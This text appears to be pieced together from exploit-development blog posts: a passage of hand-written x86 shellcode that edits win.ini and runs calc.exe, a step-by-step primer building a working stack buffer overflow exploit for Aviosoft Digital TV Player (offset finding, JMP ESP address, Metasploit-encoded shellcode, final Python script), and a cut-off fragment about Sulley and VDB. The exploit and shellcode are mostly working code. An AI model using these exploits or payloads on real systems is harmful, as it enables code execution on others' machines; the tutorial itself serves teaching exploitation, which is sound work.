;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
INC EAX ; EAX == File size (add one to it for null terminator)
PUSH EAX ; Push FileSize + 1 as argument
MOV ESI,0x77c2c407 ; Pointer to malloc()
CALL ESI ; Call malloc()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call memset() to zero out our buffer ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ECX,ECX ; Clear ECX
MOV EDX,[ESP] ; Put FileSize + 1 as the buffer size into EDX
PUSH EDX ; Push FileSize + 1 as an argument
PUSH ECX ; Fill with 0's
PUSH EAX ; Start at begining of malloc()'d memory
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;
;; Random Juggle time! ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
MOV ECX,[ESP-0x10] ; Put file size into ECX
PUSH ECX ; Push a dummy value so we don't try ESP+10 (has a \x0a in it :-/)
MOV EDX,[ESP+0x14] ; Put file handle to EDX
;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ReadFile('C:\windows\win.ini') into malloc() from above ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ESI,ESI ; Clear ESI
PUSH ESI ; Push a null onto the stack (address to be saved later)
PUSH ESI ; (NULL) _Inout_opt_ LPOVERLAPPED lpOverlapped
MOV ESI,ESP ; Move ESP -> ESI
ADD ESI, byte 0x04 ; Add 0x04 to our copy of ESP
PUSH ESI ; (Pointer to 0x0) _Out_opt_ LPDWORD lpNumberOfBytesRead,
PUSH ECX ; (FSiZ) _In_ DWORD nNumberOfBytesToRead,
PUSH EAX ; (BUFF) _Out_ LPVOID lpBuffer,
PUSH EDX ; (HNDL) _In_ HANDLE hFile,
MOV ESI,0x7c801812 ; Pointer to ReadFile()
CALL ESI ; Call ReadFile()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call strstr($filecontents,'[SciCalc]') ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x10] ; Pop out location to the file contents into EAX
PUSH byte 0x5d ; 0x0000005d ( ]) ;)
PUSH 0x636c6143 ; (Calc)
PUSH 0x6963535b ; ([Sci)
MOV EBX,ESP ; Put pointer to our string into EBX
PUSH EBX ; String to search for ([SciCalc])
PUSH EAX ; String to be scanned (file contents)
MOV ESI,0x77c47c60 ; Pointer to strstr()
CALL ESI ; Call strstr()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte to 0 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ADD EAX, byte 0x12 ; Move pointer 0x12 ahead (skip to 0/1)
PUSH byte 0x01 ; Change one byte
PUSH byte 0x30 ; Char to change to 0x30 (ascii "0")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call SetFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x38] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Call SetFilePointer()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
;; Call WriteFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Blank out EAX
PUSH EAX ; Reserve a zeroed DWORD to act as our "NumberOfBytesWritten" variable
MOV EAX,ESP ; EAX = pointer to that DWORD
XOR ECX,ECX ; Blank out ECX
PUSH ECX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x2C] ; Move file size into ECX
MOV EDX,[ESP+0x18] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x44] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Call WriteFile()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;
;; WinExec('calc.exe') ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Null terminate string
PUSH 0x6578652e ; (.exe)
PUSH 0x636c6163 ; (calc)
PUSH ESP ; Stack pointer == our data
MOV ESI,0x7c862585 ; Call WinExec()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte back to 1 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP+0x0C] ; Load pointer to "0"
PUSH byte 0x01 ; Change one byte
PUSH byte 0x31 ; Char to change to 0x31 (ascii "1")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Call memset()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call SetFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x50] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Call SetFilePointer()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call Sleep(121) to allow calc to start up and read conf ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUSH byte 0x79 ; Sleep 121 ms
MOV ESI, 0x7c802446 ; Load Sleep()
CALL ESI ; Call Sleep()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
;; Call WriteFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,ESP ; Push current stack pointer as a "NumberOfBytesWritten" variable
XOR EDX,EDX ; Clear EDX
PUSH EDX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x1C] ; Move file size into ECX
MOV EDX,[ESP+0x2C] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x58] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Call WriteFile()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; CloseHandle(fileHandle) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x14] ; Find handle
PUSH EAX ; Push handle onto stack
MOV ESI,0x7c809be7 ; Call CloseHandle()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ExitProcess(0)  ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Push 0x00 (exit(0))
MOV EAX,0x7c81d21b ; Avoid \x0a character
SUB AL, 0x11 ; Subtract mask (0x1b - 0x11 == 0x0a)
JMP EAX ; JMP - No turning back!
;;;;;;;;;;;;;;;;;;;;;;;;;;
In my next post I'll be actually re-doing this shellcode to make it a metric crap-ton smaller, and more optimized. Now I may even have room to look up the offset for kernel32.dll, and use the hash method to provide a stable shellcode across XP service packs, and even legacy stuff! :-D

If you have any questions, as always feel free to ping me on the twitters/github/whatever. Hope you guys enjoyed!
This will be part 1 of 4-5 articles I'm writing on program exploitation, memory corruption, and shellcode writing.
Yes, this is yet another exploitation primer. I know, I know. Hopefully though I'll be able to show some tricks that aren't mentioned elsewhere that I've learned and used in developing exploits over the past few years.
What I'm going to cover:
- Basic vulnerability discovery
- Stack-based buffer overflows
Environment
So to get started we need to do a few things. First of all, install Python. It's an awesome language, and you're going to need it.
# Choosing a debugger:
A debugger is vastly important. Without one you have no idea what is going on during execution. Most do pretty much the exact same thing, but some have some features that shine through.
- OllyDbg
- A classic debugger that has been recently updated. I tend to flip-flop between OllyDbg and Immunity depending on what I need to do, and occasionally WinDbg, but that's only when I really need to. The more recent version analyzes DLLs and executables for us and guesses at arguments, so we can see them before a function call. That's a huge selling point for me. It's also quite customizable for things like CALL highlighting and JMP pointing.
- Immunity Debugger
- A variation of OllyDbg put out by (you guessed it) Immunity, Inc. Also very good, and has native Python support built into it. Created primarily for exploit development, but uses an older version of OllyDbg as its base, so no automated analysis of modules :-/.
- WinDbg
- The Windows debugger. Comes with the debugging tools for Microsoft Windows, and is a total pain in the ass to setup, install, and use. Also extremely powerful. I only use it if I really have no choice though because the UI and commands are confusing and pretty poorly thought-out.
Next we need a method to find the addresses of common functions we'll want to use in our shellcode. There are a number of tools that can assist us with this.
- DLLExp
- This is my personal favorite: no-nonsense, has a search function, and lets you copy the address directly
- VDB
- I've blogged previously on how to locate and extract an executable's IAT to locate functions using VDB, a bit complex, but highly extendable.
- IDA Pro
- Literally costs about a bajillion dollars. Their free version is v5.0 (they're currently on 6.3 I believe)
# Tweak your just-in-time debugger setting in your registry.
Under HKEY_LOCAL_MACHINE(HKLM)\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug change "Debugger" to read something like "C:\dev\ollydbg\ollydbg.exe" -AEDEBUG %ld %ld, and change "Auto" to 1

This will tell windows that if something goes wrong in a program, don't just close it out, fire up our debugger of choice and attach it to the program before passing in the exception.
Discovery
Alright, now that that's done we have an exploit development platform to start with. Let's move on to finding a vulnerable program from Exploit-db, which is an excellent resource for learning.
While searching around, I wanted to find one that was just a simple, local, non-ASLR, non-DEP, stack-based buffer overflow.
Our vulnerable piece of software is called Aviosoft Digital TV Player Professional, which already has a Metasploit module written for it. There have also been a number of other exploits written for it, but it's a good place to start since it has a simple method of entry, and it's a classic "blow stuff up and overwrite EIP" type of vulnerability.
Once we have the program installed, we can go ahead and try to blow it up.
Blowing stuff up
I started with this simple python script to try to blow some stuff up and see what happened.
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Pad out our memory buffer
junk = "\x41" * 512
with open('exploit.plf','w') as f:
    f.write(start + junk)
After running our script and dragging the newly created exploit.plf onto the Aviosoft shortcut on our desktop (and clicking through the trial dialog), BAM. Buffer exploded.

This actually allows for an interesting side-note about fuzzing. If you re-run the script sticking 2000 "A"s (\x41) into the buffer, it just dies. This is actually because you overwrite a reference to the file itself further down in the stack and never end up triggering the bug in an exploitable way. This is why for Sulley, we take an iterative, block-based fuzzing approach. Basically we first try 64 bytes, then 128, 256, 512, etc. This way we have the most chance of discovering a vulnerability like this!
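To show what I mean by iterative, here's a bare-bones Python sketch of the doubling approach. To be clear, this is not Sulley's API, just the idea in a few lines. The function names and the 4096 upper limit are made up.

```python
def fuzz_lengths(start=64, limit=4096):
    """Yield doubling buffer lengths: 64, 128, 256, ... up to limit."""
    length = start
    while length <= limit:
        yield length
        length *= 2

def build_case(length, prefix="http://", fill="A"):
    """Build one test string: the trigger prefix plus `length` filler bytes."""
    return prefix + fill * length

for n in fuzz_lengths(limit=512):
    case = build_case(n)
    print(n, len(case))
    # To try a case by hand, write it out like the script above does:
    # with open("exploit_%d.plf" % n, "w") as f: f.write(case)
```

Stepping up through the sizes means you see the first length that crashes in an interesting way, instead of jumping straight to one that clobbers too much of the stack.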
This also provides some interesting challenges down the line as far as shellcode character and size limitation, but where there's a will, there's a way!
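The doubling schedule from the fuzzing side-note is easy to sketch. This is not Sulley's actual implementation, just a minimal illustration of the idea; the function name and the 2048-byte cap are made up for the example.

```python
def doubling_lengths(start=64, limit=2048):
    """Yield buffer lengths that double each round: 64, 128, 256, ..."""
    length = start
    while length <= limit:
        yield length
        length *= 2


for length in doubling_lengths():
    # The junk string that would be tried at this size
    candidate = "A" * length
    print("trying %d bytes" % len(candidate))
```

Stepping up gradually like this means the 512-byte case gets tried before the 2000-ish byte case that simply kills the program.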
There are a few important things to note here, the biggest obviously being that we overwrote EIP (the extended instruction pointer) with \x41\x41\x41\x41. The second is that we spilled our \x41's directly onto the stack (yay), which means that ESP is pointing to a buffer that we control directly.
Technique
Next we need to talk technique as far as exploitation goes. We have control of EIP, so that's cool. We can make the program execute any instructions we want it to, but what do we actually want it to execute, and how?
The most common technique, and one that absolutely works here, is to look for an instruction sequence that will let us jump EIP onto our controlled buffer, so we can write the next sequence of instructions into it and have it do what we want. For this example I'll be showing 2 different shellcodes that I've written, one that calls MessageBoxA() and one that calls WinExec("calc.exe"), but that comes later.
The next step here is to figure out two things:
- Where exactly in our buffer ESP points
- Which method we want to use to jump to our shellcode
Determining offsets
There is one (clever) way to determine the offset of our pointers and buffers: generate a predictable sequence of characters, and use that to blow up your buffer. Thankfully Metasploit has a tool for this (pattern_create.rb), and it's used like this.
#(^_^)-(!528)-(rsears@laptop)-(02:24:19)-()
#(~/noscan/metasploit-framework/tools)
./pattern_create.rb 512
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar
This will generate us a 512 byte string that we can stick into our program instead of 512 "A" characters like so:
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Use metasploit's pattern_create to generate our string
junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar"
with open('exploit.plf','w') as f:
    f.write(start + junk)
So now after re-running our script, and re-opening Aviosoft, we see this

Note that EIP is overwritten with 0x69413469, but since the bytes are stored little-endian, the string that overwrote it was actually \x69\x34\x41\x69, or "i4Ai". Another thing to notice is that ESP points to a string that starts with "Aj1A", so those are our two important offsets. Maybe this diagram will help clarify it a bit.

Something to note is that we didn't extend the buffer as far as we could have; finding the limit takes some experimentation. As far as our offsets go though, we can either count the number of bytes up to EIP (the dumb way) or use another nice tool from Metasploit, pattern_offset.rb.
#(^_^)-(!529)-(rsears@laptop)-(02:25:35)-()
#(~/noscan/metasploit-framework/tools)
./pattern_offset.rb i4Ai
[*] Exact match at offset 253
#(^_^)-(!530)-(rsears@laptop)-(03:14:06)-()
#(~/noscan/metasploit-framework/tools)
./pattern_offset.rb Aj1A
[*] Exact match at offset 273
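If you don't have Metasploit handy, the idea behind both tools fits in a few lines of Python. This is only a rough sketch and not Metasploit's implementation; the function names are mine, and it assumes the pattern follows the uppercase/lowercase/digit ordering visible in the output above.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build an 'Aa0Aa1Aa2...' style string of the requested length."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length]


def pattern_offset(needle, length=512):
    """Return the index of needle inside the pattern, or -1 if it is absent."""
    return pattern_create(length).find(needle)


def register_to_text(value):
    """Turn a 32-bit register value back into the 4 bytes as they sat in memory."""
    return struct.pack("<L", value).decode("ascii")


eip_text = register_to_text(0x69413469)
print(eip_text, pattern_offset(eip_text))
print("Aj1A", pattern_offset("Aj1A"))
```

The `"<L"` format is what undoes the little-endian flip: the register shows 0x69413469, but the bytes in the file were "i4Ai".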
So now we have our offsets! Hooray. Let's double check that though, and modify our script to look like this:
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 252 "A"s
junk = "\x41" * 252
# Overwrite EIP with 0x42424242
EIP = "BBBB"
with open('exploit.plf','w') as f:
    f.write(start + junk + EIP + junk)
Note: in this case it's necessary to pad both sides of EIP to trigger the bug. That's not always the case, but exploit development is very much guess and check work.

Uh-oh! Looks like our EIP was a byte off (0x41424242). Since the stray \x41 is the most significant byte (the last one in memory), our padding is a single byte short of alignment (little-endian strikes again). If we had put \x43 after our EIP instead of just repeating the junk variable, it would have been 0x43424242. Heck, let's do that to distinguish the before and after of EIP while fixing the alignment at the same time. Turns out I just fat-fingered it!
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Insert 255 "C"s
junk2 = "\x43" * 255
# Overwrite EIP with 0x42424242 for real this time
EIP = "BBBB"
with open('exploit.plf','w') as f:
    f.write(start + junk + EIP + junk2)
Re-running it, things look much better.

So let's use the same technique to verify that we have the correct offset for the start of our buffer, shall we? Metasploit claims our offset starts at 273 bytes in, so 253 + 4 (eip) = 257. 273 - 257 = 16. So we have 16 bytes after EIP that we need to pad before our buffer starts.
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Overwrite EIP with 0x42424242 for real this time
EIP = "BBBB"
# Insert 16 "C"s
junk2 = "\x43" * 16
# Insert 128 "D"s
junk3 = "\x44" * 128
with open('exploit.plf','w') as f:
    f.write(start + junk + EIP + junk2 + junk3)
And if we re-run yet again...

Awesome opossum! So now that we have the proper buffer and EIP alignments, we can start trying to figure out how to jump to our shellcode. For this task I usually opt for mona.py from the Corelan team, but I'll be showing you how to use msfpescan to do the same thing.
What we're doing is looking for a way to jump to the address stored in ESP. There are at least 2 different instruction combinations that will get us there, the first being the obvious JMP ESP, and the second PUSH ESP; RETN, which pushes the value of ESP onto the stack, then returns to it. I'll get into those more in the shell-coding section (which may end up being its own entity).
#(ಠ_ಠ)-(!536)-(rsears@laptop)-(03:50:17)-()
#(~/noscan/metasploit-framework)
./msfpescan -j ESP AviosoftDTV.EXE
[AviosoftDTV.EXE]
...SNIP...
0x0040dc8b jmp esp
0x0040dc8f jmp esp
0x0040dc93 jmp esp
0x0040dc97 jmp esp
0x0040dc9b jmp esp
0x0040dc9f jmp esp
0x0040e04f jmp esp
0x0040e053 jmp esp
0x0040e057 jmp esp
0x0040e05b jmp esp
0x0040e05f jmp esp
0x004127ff push esp; ret
0x00417070 push esp; ret
0x00417e5b jmp esp
0x00417e5f jmp esp
0x004181c3 jmp esp
...SNIP...
A word of caution when selecting memory addresses: we're shoveling these memory addresses and commands through a string buffer, so avoid characters that mess with that, namely \x00, which is how strings are terminated in C. You should also avoid \x0a and \x0d, the \n and \r characters, respectively. These will also cause you headaches. Since every address in the executable we're using starts with a null byte, none of these memory addresses will work! Sad day.
Thankfully the executable isn't the only address space we can reach. If you re-crash the program and go to View -> Executable Modules, you can see a list of loaded modules whose JMP ESP opcodes we can use! For maximum portability I tend to avoid system DLLs, as those change from platform to platform, but DLLs that are loaded from the same directory as the executable are typically the same across platforms (and therefore the memory addresses stay the same), so you have a universal JMP ESP for that program. How cool is that?
So we know that the main AviosoftDTV.exe is out. Almost all of the other non-system modules will work perfectly fine (except for PlayerDLL.dll, as that has a 0x0a in the base address). I ended up using MediaPlayerCtrl.dll for no reason in particular. Let's see what Metasploit has to say about it, shall we?
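Checking candidate addresses by eye gets old fast, so here is a small sketch of the same check in Python. The helper name is made up for this example, and the bad-byte set is just the three characters called out above; other targets may well choke on more.

```python
import struct

# Bytes that would cut the string short or mangle it on the way in
BAD_BYTES = bytearray(b"\x00\x0a\x0d")


def is_string_safe(address, bad_bytes=BAD_BYTES):
    """Return True if none of the address's four bytes is in bad_bytes."""
    packed = bytearray(struct.pack("<L", address))
    return not any(byte in bad_bytes for byte in packed)


# Addresses taken from the msfpescan listings in this post
for address in (0x0040dc8b, 0x004127ff, 0x640614e3):
    print("0x%08x" % address, is_string_safe(address))
```

Anything at 0x00xxxxxx fails because the packed form contains a \x00 byte.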
#(^_^)-(!537)-(rsears@laptop)-(03:51:48)-()
#(~/noscan/metasploit-framework)
./msfpescan -j ESP MediaPlayerCtrl.dll
[MediaPlayerCtrl.dll]
0x6401d1a5 push esp; ret
0x6401d1be push esp; retn 0x0004
0x64032127 push esp; retn 0x6405
0x6403230b push esp; ret
0x64047737 push esp; retn 0x000c
0x640614e3 jmp esp
0x640627a3 jmp esp
A significantly shorter list, but all of these work equally well. I usually opt for a straight JMP ESP, but all of these combinations of opcodes will work just fine.
So let's go ahead and insert any of these memory addresses into EIP, using struct.pack to save us from converting to little-endian by hand (not hard, just confusing), and insert an INT3 (\xCC) instruction before our junk3 buffer. We do this because \x44 just happens to be INC ESP, so without the interrupt the program won't actually barf until it tries to execute a NULL instruction down the line.
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Overwrite EIP
from struct import pack
eip = pack('<L',0x640614e3) # JMP ESP
# Insert 16 "C"s
junk2 = "\x43" * 16
# Interrupt our execution flow
interrupt = "\xcc"
# Insert 128 "D"s
junk3 = "\x44" * 128
with open('exploit.plf','w') as f:
    f.write(start + junk + eip + junk2 + interrupt + junk3)

Cool beans! We have successfully transferred control from EIP to our buffer! I have too much to say about shellcoding in this post, so I guess I'll save that for the next one, but let's go ahead and generate some shellcode through metasploit, and pop a calc.exe, shall we?
#(^_^)-(!551)-(rsears@laptop)-(04:17:20)-()
#(~/noscan/metasploit-framework)
./msfpayload windows/exec CMD=calc.exe R | ./msfencode -b '\x00\x0a\x0d' -t c
[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
unsigned char buf[] =
"\xbb\x74\xad\x03\x38\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xe8\xfc\x31\x58\x0e\x03\x2c\xa3\xe1\xcd\x30\x53\x6c"
"\x2d\xc8\xa4\x0f\xa7\x2d\x95\x1d\xd3\x26\x84\x91\x97\x6a\x25"
"\x59\xf5\x9e\xbe\x2f\xd2\x91\x77\x85\x04\x9c\x88\x2b\x89\x72"
"\x4a\x2d\x75\x88\x9f\x8d\x44\x43\xd2\xcc\x81\xb9\x1d\x9c\x5a"
"\xb6\x8c\x31\xee\x8a\x0c\x33\x20\x81\x2d\x4b\x45\x55\xd9\xe1"
"\x44\x85\x72\x7d\x0e\x3d\xf8\xd9\xaf\x3c\x2d\x3a\x93\x77\x5a"
"\x89\x67\x86\x8a\xc3\x88\xb9\xf2\x88\xb6\x76\xff\xd1\xff\xb0"
"\xe0\xa7\x0b\xc3\x9d\xbf\xcf\xbe\x79\x35\xd2\x18\x09\xed\x36"
"\x99\xde\x68\xbc\x95\xab\xff\x9a\xb9\x2a\xd3\x90\xc5\xa7\xd2"
"\x76\x4c\xf3\xf0\x52\x15\xa7\x99\xc3\xf3\x06\xa5\x14\x5b\xf6"
"\x03\x5e\x49\xe3\x32\x3d\x07\xf2\xb7\x3b\x6e\xf4\xc7\x43\xc0"
"\x9d\xf6\xc8\x8f\xda\x06\x1b\xf4\x15\x4d\x06\x5c\xbe\x08\xd2"
"\xdd\xa3\xaa\x08\x21\xda\x28\xb9\xd9\x19\x30\xc8\xdc\x66\xf6"
"\x20\xac\xf7\x93\x46\x03\xf7\xb1\x24\xc2\x6b\x59\x85\x61\x0c"
"\xf8\xd9";
Now we just modify our script to insert the shellcode in the last buffer, and remove our interrupt (you can keep it in if you want to see how the shellcode works). Since there's an alignment problem with the assembly (it'll start an instruction too late), the shellcode won't execute properly unless you NOP slide down to it, so we throw some in for good measure!
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Overwrite EIP
from struct import pack
eip = pack('<L',0x640614e3) # JMP ESP
# Insert 16 "C"s
junk2 = "\x43" * 16
# Insert some NOPs to slide down to our code
nops = "\x90" * 16
shellcode = (
"\xbb\x74\xad\x03\x38\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xe8\xfc\x31\x58\x0e\x03\x2c\xa3\xe1\xcd\x30\x53\x6c"
"\x2d\xc8\xa4\x0f\xa7\x2d\x95\x1d\xd3\x26\x84\x91\x97\x6a\x25"
"\x59\xf5\x9e\xbe\x2f\xd2\x91\x77\x85\x04\x9c\x88\x2b\x89\x72"
"\x4a\x2d\x75\x88\x9f\x8d\x44\x43\xd2\xcc\x81\xb9\x1d\x9c\x5a"
"\xb6\x8c\x31\xee\x8a\x0c\x33\x20\x81\x2d\x4b\x45\x55\xd9\xe1"
"\x44\x85\x72\x7d\x0e\x3d\xf8\xd9\xaf\x3c\x2d\x3a\x93\x77\x5a"
"\x89\x67\x86\x8a\xc3\x88\xb9\xf2\x88\xb6\x76\xff\xd1\xff\xb0"
"\xe0\xa7\x0b\xc3\x9d\xbf\xcf\xbe\x79\x35\xd2\x18\x09\xed\x36"
"\x99\xde\x68\xbc\x95\xab\xff\x9a\xb9\x2a\xd3\x90\xc5\xa7\xd2"
"\x76\x4c\xf3\xf0\x52\x15\xa7\x99\xc3\xf3\x06\xa5\x14\x5b\xf6"
"\x03\x5e\x49\xe3\x32\x3d\x07\xf2\xb7\x3b\x6e\xf4\xc7\x43\xc0"
"\x9d\xf6\xc8\x8f\xda\x06\x1b\xf4\x15\x4d\x06\x5c\xbe\x08\xd2"
"\xdd\xa3\xaa\x08\x21\xda\x28\xb9\xd9\x19\x30\xc8\xdc\x66\xf6"
"\x20\xac\xf7\x93\x46\x03\xf7\xb1\x24\xc2\x6b\x59\x85\x61\x0c"
"\xf8\xd9"
)
with open('exploit.plf','w') as f:
    f.write(start + junk + eip + junk2 + nops + shellcode)
And Voila! We have arbitrary code execution! :)

I'll start this off by saying that Sulley's PyDbg module (while good in its own way) is not ideal for a multi-platform fuzzing engine like Sulley.
Sure, it works for the most part, but in order to facilitate fuzzing and crash analysis on *nix platforms right now, you need to use core dumps. I find this less than ideal, and honestly quite messy.
I was looking for a unified solution to this when @pedramamini recommended I look into @invisig0th's VDB/Vtrace.
Holy Crap
